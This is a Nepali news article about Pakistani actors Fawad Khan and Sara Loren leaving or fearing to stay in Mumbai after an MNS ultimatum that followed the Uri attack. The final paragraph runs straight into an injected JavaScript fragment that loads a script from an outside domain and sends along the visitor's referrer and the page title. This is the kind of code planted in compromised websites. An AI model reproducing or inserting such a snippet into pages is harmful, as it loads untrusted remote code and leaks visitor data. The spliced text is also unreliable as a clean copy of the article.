पाकिस्तानी कलाकारलाई ४८ घन्टा भित्र भारत छाड्न घम्की

एजेन्सी, असोज, १२ । महाराष्ट्र नवनिर्माण सेना (एमएनएस) का कार्यकर्ताले केही दिनअघि मात्र पाकिस्तानी कलाकारलाई ४८ घन्टा भित्र देश छाड्न धम्की दिएबाट डराएका पाकिस्तानी कलाकार फवाद खानले भारत छोडेका छन् ।
फिल्म खुबसुरतमा अभिनय गरेका फवादले भारत–पाकिस्तानबीच चलिरहेको युद्धको स्थितिमा भारतमा पाकिस्तानी कलाकार सुरक्षित रहन नसक्ने भन्दै मुम्बई छोडेका हुन् ।
अल्टिमेटमको अन्तिम दिन सकिएपछि पाकिस्तानी अभिनेत्री सारा लारेनले पनि आफूलाई मुम्बईमा बस्न डर लागिरहेको प्रतिक्रिया दिएकी थीइन ।sara
मर्डर–३, बर्खा र इश्क क्लिकजस्ता बलिउड फिल्ममा ख्याति कमाई सकेकी अभिनेत्री सारा लारेनले हामीहरू एक आपसमा लड्नु भन्दा पनि आतंकवाद विरूद्ध लड्नु पर्छ भन्ने प्रतिक्रिया दिइन । लारेनले स्थिति बिग्रिए दुबईस्थित घरमा फर्किने बताएकी छिन् ।
एमएनएसले घम्की दिएको केही घन्टापछि नै मुम्बई प्रहरीले पाकिस्तानी कलाकारलाई सुरक्षा दिन सक्षम भएको बताएको थियो तर पनि धेरै पाकिस्तानी कलाकार आश्वस्त हुन सकेनन । काश्मीरको उडीमा भएको आतंकवादी हमलामा १७ भारतीय सेनाको निधन भएपछि भारतले यसको दोष पाकिस्तानलाई लगाउँदै आइरहेको छ ।s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Loading...